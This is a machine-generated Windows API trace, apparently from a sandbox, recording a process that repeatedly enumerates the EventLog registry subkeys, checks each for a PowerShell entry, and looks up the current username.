	[0381.232] RegQueryInfoKeyW (in: hKey=0x1cc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d16c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d168, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d16c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d168*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0381.232] CoTaskMemFree (pv=0x0) 
	[0381.233] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0381.233] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x0, lpName=0x3c94a0, lpcchName=0x14d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0381.233] CoTaskMemFree (pv=0x3c94a0) 
	[0381.233] CoTaskMemFree (pv=0x0) 
	[0381.233] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0381.233] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x1, lpName=0x3c94a0, lpcchName=0x14d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0381.233] CoTaskMemFree (pv=0x3c94a0) 
	[0381.233] CoTaskMemFree (pv=0x0) 
	[0381.233] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0381.233] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x2, lpName=0x3c94a0, lpcchName=0x14d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0381.233] CoTaskMemFree (pv=0x3c94a0) 
	[0381.233] CoTaskMemFree (pv=0x0) 
	[0381.233] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0381.233] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x3, lpName=0x3c94a0, lpcchName=0x14d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0381.233] CoTaskMemFree (pv=0x3c94a0) 
	[0381.233] CoTaskMemFree (pv=0x0) 
	[0381.233] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0381.233] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x4, lpName=0x3c94a0, lpcchName=0x14d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0381.233] CoTaskMemFree (pv=0x3c94a0) 
	[0381.233] CoTaskMemFree (pv=0x0) 
	[0381.233] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0381.233] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x5, lpName=0x3c94a0, lpcchName=0x14d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0381.233] CoTaskMemFree (pv=0x3c94a0) 
	[0381.233] CoTaskMemFree (pv=0x0) 
	[0381.233] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0381.233] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x6, lpName=0x3c94a0, lpcchName=0x14d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0381.233] CoTaskMemFree (pv=0x3c94a0) 
	[0381.234] CoTaskMemFree (pv=0x0) 
	[0381.234] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0381.234] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x7, lpName=0x3c94a0, lpcchName=0x14d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0381.234] CoTaskMemFree (pv=0x3c94a0) 
	[0381.234] CoTaskMemFree (pv=0x0) 
	[0381.234] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0381.234] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x8, lpName=0x3c94a0, lpcchName=0x14d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0381.234] CoTaskMemFree (pv=0x3c94a0) 
	[0381.234] CoTaskMemFree (pv=0x0) 
	[0381.234] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d258 | out: phkResult=0x14d258*=0x1d4) returned 0x0
	[0381.234] RegOpenKeyExW (in: hKey=0x1d4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d258 | out: phkResult=0x14d258*=0x0) returned 0x2
	[0381.234] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d258 | out: phkResult=0x14d258*=0x1d0) returned 0x0
	[0381.234] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d258 | out: phkResult=0x14d258*=0x0) returned 0x2
	[0381.234] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d258 | out: phkResult=0x14d258*=0x304) returned 0x0
	[0381.234] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d258 | out: phkResult=0x14d258*=0x0) returned 0x2
	[0381.234] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d258 | out: phkResult=0x14d258*=0x308) returned 0x0
	[0381.234] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d258 | out: phkResult=0x14d258*=0x0) returned 0x2
	[0381.235] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d258 | out: phkResult=0x14d258*=0x31c) returned 0x0
	[0381.235] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d258 | out: phkResult=0x14d258*=0x0) returned 0x2
	[0381.235] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d258 | out: phkResult=0x14d258*=0x330) returned 0x0
	[0381.235] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d258 | out: phkResult=0x14d258*=0x0) returned 0x2
	[0381.235] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d258 | out: phkResult=0x14d258*=0x334) returned 0x0
	[0381.235] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d258 | out: phkResult=0x14d258*=0x0) returned 0x2
	[0381.235] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d258 | out: phkResult=0x14d258*=0x338) returned 0x0
	[0381.235] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d258 | out: phkResult=0x14d258*=0x0) returned 0x2
	[0381.235] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d258 | out: phkResult=0x14d258*=0x33c) returned 0x0
	[0381.235] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d258 | out: phkResult=0x14d258*=0x340) returned 0x0
	[0381.235] RegCloseKey (hKey=0x340) returned 0x0
	[0381.236] RegCloseKey (hKey=0x1cc) returned 0x0
	[0381.236] RegCloseKey (hKey=0x33c) returned 0x0
	[0381.247] CoTaskMemAlloc (cb=0x804) returned 0x1b711400
	[0381.247] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b711400, nSize=0x14d468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d468) returned 0x1
	[0381.249] CoTaskMemFree (pv=0x1b711400) 
	[0381.250] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0381.250] GetUserNameW (in: lpBuffer=0x3c94a0, pcbBuffer=0x14d4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d4a8) returned 1
	[0381.250] CoTaskMemFree (pv=0x3c94a0) 
	[0382.255] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1a8 | out: phkResult=0x14d1a8*=0x308) returned 0x0
	[0382.255] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d11c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d118, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d11c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d118*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.256] CoTaskMemFree (pv=0x0) 
	[0382.256] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.256] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x0, lpName=0x3c94a0, lpcchName=0x14d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.256] CoTaskMemFree (pv=0x3c94a0) 
	[0382.256] CoTaskMemFree (pv=0x0) 
	[0382.256] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.256] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x1, lpName=0x3c94a0, lpcchName=0x14d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.256] CoTaskMemFree (pv=0x3c94a0) 
	[0382.256] CoTaskMemFree (pv=0x0) 
	[0382.256] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.256] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x2, lpName=0x3c94a0, lpcchName=0x14d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.256] CoTaskMemFree (pv=0x3c94a0) 
	[0382.256] CoTaskMemFree (pv=0x0) 
	[0382.256] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.256] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x3, lpName=0x3c94a0, lpcchName=0x14d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.256] CoTaskMemFree (pv=0x3c94a0) 
	[0382.256] CoTaskMemFree (pv=0x0) 
	[0382.256] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.256] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x4, lpName=0x3c94a0, lpcchName=0x14d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.256] CoTaskMemFree (pv=0x3c94a0) 
	[0382.256] CoTaskMemFree (pv=0x0) 
	[0382.256] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.256] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x5, lpName=0x3c94a0, lpcchName=0x14d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.256] CoTaskMemFree (pv=0x3c94a0) 
	[0382.256] CoTaskMemFree (pv=0x0) 
	[0382.256] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.256] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x6, lpName=0x3c94a0, lpcchName=0x14d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.257] CoTaskMemFree (pv=0x3c94a0) 
	[0382.257] CoTaskMemFree (pv=0x0) 
	[0382.257] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.257] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x7, lpName=0x3c94a0, lpcchName=0x14d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.257] CoTaskMemFree (pv=0x3c94a0) 
	[0382.257] CoTaskMemFree (pv=0x0) 
	[0382.257] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.257] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x8, lpName=0x3c94a0, lpcchName=0x14d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.257] CoTaskMemFree (pv=0x3c94a0) 
	[0382.257] CoTaskMemFree (pv=0x0) 
	[0382.257] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x31c) returned 0x0
	[0382.257] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x0) returned 0x2
	[0382.257] RegOpenKeyExW (in: hKey=0x308, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x330) returned 0x0
	[0382.257] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x0) returned 0x2
	[0382.257] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x334) returned 0x0
	[0382.257] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x0) returned 0x2
	[0382.257] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x338) returned 0x0
	[0382.257] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x0) returned 0x2
	[0382.258] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x300) returned 0x0
	[0382.258] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x0) returned 0x2
	[0382.258] RegOpenKeyExW (in: hKey=0x308, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x32c) returned 0x0
	[0382.258] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x0) returned 0x2
	[0382.258] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x1d4) returned 0x0
	[0382.258] RegOpenKeyExW (in: hKey=0x1d4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x0) returned 0x2
	[0382.258] RegOpenKeyExW (in: hKey=0x308, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x1d0) returned 0x0
	[0382.258] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x0) returned 0x2
	[0382.258] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x304) returned 0x0
	[0382.258] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x344) returned 0x0
	[0382.258] RegCloseKey (hKey=0x344) returned 0x0
	[0382.259] RegCloseKey (hKey=0x308) returned 0x0
	[0382.259] RegCloseKey (hKey=0x304) returned 0x0
	[0382.260] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1a8 | out: phkResult=0x14d1a8*=0x304) returned 0x0
	[0382.260] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d11c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d118, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d11c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d118*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.260] CoTaskMemFree (pv=0x0) 
	[0382.260] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.260] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x0, lpName=0x3c94a0, lpcchName=0x14d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.260] CoTaskMemFree (pv=0x3c94a0) 
	[0382.260] CoTaskMemFree (pv=0x0) 
	[0382.260] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.260] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x1, lpName=0x3c94a0, lpcchName=0x14d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.260] CoTaskMemFree (pv=0x3c94a0) 
	[0382.260] CoTaskMemFree (pv=0x0) 
	[0382.260] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.260] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x2, lpName=0x3c94a0, lpcchName=0x14d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.260] CoTaskMemFree (pv=0x3c94a0) 
	[0382.260] CoTaskMemFree (pv=0x0) 
	[0382.260] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.260] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x3, lpName=0x3c94a0, lpcchName=0x14d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.260] CoTaskMemFree (pv=0x3c94a0) 
	[0382.260] CoTaskMemFree (pv=0x0) 
	[0382.260] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.260] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x4, lpName=0x3c94a0, lpcchName=0x14d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.261] CoTaskMemFree (pv=0x3c94a0) 
	[0382.261] CoTaskMemFree (pv=0x0) 
	[0382.261] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.261] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x5, lpName=0x3c94a0, lpcchName=0x14d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.261] CoTaskMemFree (pv=0x3c94a0) 
	[0382.261] CoTaskMemFree (pv=0x0) 
	[0382.261] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.261] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x6, lpName=0x3c94a0, lpcchName=0x14d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.261] CoTaskMemFree (pv=0x3c94a0) 
	[0382.261] CoTaskMemFree (pv=0x0) 
	[0382.261] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.261] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x7, lpName=0x3c94a0, lpcchName=0x14d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.261] CoTaskMemFree (pv=0x3c94a0) 
	[0382.261] CoTaskMemFree (pv=0x0) 
	[0382.261] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.261] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x8, lpName=0x3c94a0, lpcchName=0x14d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.261] CoTaskMemFree (pv=0x3c94a0) 
	[0382.261] CoTaskMemFree (pv=0x0) 
	[0382.261] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x308) returned 0x0
	[0382.261] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x0) returned 0x2
	[0382.261] RegOpenKeyExW (in: hKey=0x304, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x344) returned 0x0
	[0382.262] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x0) returned 0x2
	[0382.262] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x348) returned 0x0
	[0382.262] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x0) returned 0x2
	[0382.262] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x34c) returned 0x0
	[0382.262] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x0) returned 0x2
	[0382.262] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x350) returned 0x0
	[0382.262] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x0) returned 0x2
	[0382.262] RegOpenKeyExW (in: hKey=0x304, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x354) returned 0x0
	[0382.262] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x0) returned 0x2
	[0382.262] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x358) returned 0x0
	[0382.262] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x0) returned 0x2
	[0382.263] RegOpenKeyExW (in: hKey=0x304, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x35c) returned 0x0
	[0382.263] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x0) returned 0x2
	[0382.263] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x360) returned 0x0
	[0382.263] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x364) returned 0x0
	[0382.263] RegCloseKey (hKey=0x364) returned 0x0
	[0382.263] RegCloseKey (hKey=0x304) returned 0x0
	[0382.263] RegCloseKey (hKey=0x360) returned 0x0
	[0382.264] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d178 | out: phkResult=0x14d178*=0x360) returned 0x0
